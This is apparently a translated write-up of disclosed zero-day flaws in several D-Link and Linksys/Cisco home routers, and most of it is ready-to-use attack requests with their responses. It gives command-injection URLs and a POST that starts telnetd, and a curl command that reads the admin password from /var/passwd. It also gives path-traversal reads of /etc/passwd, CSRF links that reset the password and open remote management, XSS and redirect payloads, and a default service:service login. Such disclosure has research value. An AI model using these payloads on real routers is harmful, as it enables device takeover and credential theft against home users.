The next zero-day vulnerabilities in various routers

It is alleged that the problem is in the H1 revision, firmware version 8.04 of September 4, 2012 and 8.04 of January 18, 2013. However, I could not find these versions on the vendor's official website .

Execution of arbitrary commands OS router

An authorized user can execute an arbitrary command on the device by sending a GET request, in which the commands will be transmitted in the ping_ipaddr parameter

Example:

http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr= http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= 

The response to the command comes in the body of the HTTP response:

 HTTP/1.0 200 OK Pragma: no-cache Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <script type="text/javascript" src="common.js.htm"></script> <script language="javascript"> CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS}); var pingResult="Domain"; var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <<== var vctinfo= [ {ethport:'0', status:'0', rate:'0', dup:'0'}, {ethport:'1', status:'0', rate:'0', dup:'0'}, {ethport:'2', status:'0', rate:'0', dup:'0'}, 

Maybe someone will ask: "What is the vulnerability, if only this is possible for an authorized user?" Let me explain: an attacker can use social engineering and throw a specially crafted link to the owner of the router.

Information disclosure

GET request to the address of the form

 http://IP_/gconfig.htm 

will return to us:

 var ModelName = 'DIR-615'; var systemName='DLINK-DIR615'; var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0} 

Change password without entering old

It is enough to send a GET request with the following contents:

 http://IP_/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615 

Representatives of D-Link were notified about security problems, but said that there would be no fix, because in their opinion, this is a problem not in their equipment, but in the browsers and the users of their devices themselves.

DIR-300 - vulnerable versions:

• 2.12 of 01/18/2012
• 2.13 from 07.11.2012

DIR-600 - vulnerable versions:

• 2.12b02 from 01/17/2012
• 2.13b01 from 07/11/2012
• 2.14b01 dated 22/01/2013

Execution of arbitrary commands OS router

An unauthorized user can execute an arbitrary command on the device by sending a GET request, in which the commands will be transmitted in the cmd parameter

Example - starting the telnetd server

 Request: POST /command.php HTTP/1.1 Host: 192.168.178.222 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.178.222/ Content-Length: 15 Cookie: uid=hfaiGzkB4z Pragma: no-cache Cache-Control: no-cache cmd=telnetd; 

Insecure storage of sensitive information

Passwords on the device are stored in clear text, without hashing:

 # cat var/passwd "admin" "test" "0" 

View the current user password is possible like this:

 root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php "admin" "THESECRETPASS" "0" 

Information disclosure

Request type:

 http://Target-IP/DevInfo.txt 

will return to us:

 HTTP/1.1 200 OK Server: Linux, HTTP/1.1, DIR-600 Ver 2.14 Date: Fri, 31 Dec 1999 18:04:13 GMT Content-Length: 267 Firmware External Version: V2.14 Firmware Internal Version: d1mg Model Name: DIR-600 Hardware Version: Bx WLAN Domain: 826 Kernel: 2.6.33.2 Language: en Graphcal Authentication: Disable LAN MAC: <snip> WAN MAC: <snip> WLAN MAC: <snip> 

Representatives of D-Link were notified about security problems, but said that there would be no fix, because in their opinion, this is a problem not in their equipment, but in the browsers and the users of their devices themselves.

Vulnerable firmware versions:

Firmware Version: 1.0.4.80
Kernel Version: 4.1-18
Web Server Version: 1.5

Reading files on the device

An authorized user can read files on the device.

 http://IP_/../../etc/passwd 

will return an answer like:

 HTTP/1.0 200 OK Content-type: text/plain Expires: Sat, 24 May 1980.7:00:00.GMT Pragma: no-cache Server: simple httpd 1.0 root:x:0:0:root:/root:/bin/bash demo:x:5000:100:Demo User:/home/demo:/bin/bash nobody:x:65534:65534:Nobody:/htdocs:/bin/bash 

Similarly, reading directories:

 /../../var/ HTTP/1.0 200 OK Content-type: text/html Expires: Sat, 24 May 1980.7:00:00.GMT Pragma: no-cache Server: simple httpd 1.0 <H1>Index of ../../var/</H1> <p><a href="/../../var/.">.</a></p> <p><a href="/../../var/..">..</a></p> <p><a href="/../../var/.Skype">.Skype</a></p> <p><a href="/../../var/jffs2">jffs2</a></p> <p><a href="/../../var/htdocs">htdocs</a></p> <p><a href="/../../var/cnxt">cnxt</a></p> <p><a href="/../../var/ppp">ppp</a></p> <p><a href="/../../var/conf">conf</a></p> <p><a href="/../../var/bin">bin</a></p> <p><a href="/../../var/usr">usr</a></p> <p><a href="/../../var/tmp">tmp</a></p> 

But since it is necessary to be authorized on the device and it is necessary to get an answer to the request - it is not entirely clear how an attacker can take advantage

Crossite scripting

The presence of "factory" account

By default, on the device there is an account with a login: password service: service . I understand it is not possible to change it provided by regular means.

The manufacturer was notified of security issues in August 2012, but did not respond.

Vulnerable firmware versions:
e1500:

• v1.0.00 - build 9 - February 17, 2011
• v1.0.04 - build 2 - March 8, 2012
• v1.0.05 - build 1 - August 23, 2012

e2500

• v1.0.03

Execution of arbitrary commands OS router

An authorized user can execute an arbitrary command on the device by sending a GET request, in which the commands will be transmitted in the ping_size parameter

Example:

 http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip= 

Directory Expansion

Example:

 POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 75 submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version 

The answer will come in the form:

 HTTP/1.1 200 Ok Server: httpd Date: Thu, 01 Jan 1970 00:00:29 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html Connection: close Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012 

Change password without entering old

An authorized user can change the password by sending a specially created POST request to the device:

 POST /apply.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.1.1/Management.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 311 submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 

CSRF attack for password change:

 http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 

Crossite scripting

 POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 300 submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0 

Redirect to another site

 POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 290 submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0